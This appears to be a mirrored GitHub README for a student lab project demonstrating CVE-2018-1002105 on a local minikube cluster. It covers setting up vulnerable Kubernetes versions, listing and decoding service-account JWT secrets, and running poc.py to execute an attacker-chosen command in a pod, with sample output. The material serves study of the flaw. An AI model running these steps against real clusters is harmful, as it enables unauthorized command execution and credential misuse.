Giters

sh-ubh / CVE-2018-1002105

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CMPT733-Group11(0x90)

CVE-2018-1002105

Members: Abhishek Rungta, Shubham Saini, Siddhant Sood

Environment Setup

  • A linux VM (Such as Ubuntu 20.04)
  • Minikube for local deploymnet of kubernetes
  • Any of these older versions(1.0.x— 1.9.x, 1.10.0—1.10.10,1.11.0—1.11.4,1.12.0—1.12.2)

Run the exploit

We have provided a virtual box image (.ova file) Download it and create a VM from it. The ova provided is pre configured with docker v18.09 and minikube v1.9.0

OVA link

Build the kubernetes cluster

As our virtual image already has minkube and the required kubernetes versions just run the following command to start minikube

minikube start --kubernetes-version=v1.12.2

Create new user, namespace and assign role

Create a new user and a namespace and assign RBAC role to the user created using the followig command.

kubectl apply -f fixing_policy.yml

Remove access to conntract

kubectl edit configmaps kube-proxy --namespace=kube-system

Change the set maxPerCore to 0

Get the JWT token

First run the following command to get all the jwt tokens stored in the system

kubectl get secrets -A

To get the secret of the particular user created run the following command:

kubectl -n [namespace] get secrets [user-token] -o json

Then base64 decode it.

export TOKEN=$(echo TOKEN | base64 -d)
echo $TOKEN

Get the IP address and port No.

kubectl cluster-info

To deploy the pod

kubectl run --image=nginx:alpine securenginx -n poc

Run the POC

Specify all the required arguments:
-t for the target> ip:port (required)
-j for the JWT token of the user (required)
-p for pod (required)
-n for the namespace
-m for the method (required)
-c for the container
-x for the attacker command

Test case

Input

./poc.py -t [IP:Port] -j [token] -p [pod] -n [namespace] -m attach -x "command"

./poc.py -t 127.0.0.1:32768 -j $TOKEN -p securenginx -m attach -n poc -x "ifconfig eth0"

Output

eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:02  
          inet addr:172.17.0.2  Bcast:172.17.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1313 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1224 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:217603 (212.5 KiB)  TX bytes:428778 (418.7 KiB)

{"metadata":{},"status":"Success"}

Video Demo

Demo video link

About

License:MIT License

Languages

Language:Python 100.0%